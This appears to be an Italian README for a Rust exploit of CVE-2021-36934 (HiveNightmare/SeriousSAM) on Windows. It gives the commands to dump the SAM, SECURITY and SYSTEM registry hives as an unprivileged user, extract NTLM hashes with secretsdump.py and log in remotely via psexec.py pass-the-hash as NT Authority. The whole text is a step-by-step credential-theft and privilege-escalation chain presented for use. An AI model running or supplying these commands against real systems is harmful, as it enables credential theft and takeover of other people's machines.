
Exploit per CVE-2021-36934
Un exploit per la vulnerabilità HiveNightmare/SeriousSAM che permette di leggere hive del registro contenenti dati sensibili senza privilegi di amministratore. Se non sembra escalation di privilegi, non so cosa lo sia.
Dopo aver compilato l'exploit con cargo build e recuperato il binario, distribuiscilo nel tuo ambiente di test, apri CMD ed esegui .\oxide_hive [max shadow copies], il valore predefinito per le copie shadow è 15. Gli hive SAM, SECURITY e SYSTEM dovrebbero essere scaricati nella directory di lavoro.
A questo punto puoi usare questo script con il comando secretsdump.py -sam SAM.dump -security SECURITY.dump -system SYSTEM.dump local per recuperare gli hash NTLM.
Poi puoi usare un altro script con il comando psexec.py -hashes <hash dell'account> <utente>@<ip della macchina> cmd.exe per accedere da remoto a qualsiasi account. Complimenti, sei passato da utente non privilegiato a NT Authority con solo 3 comandi.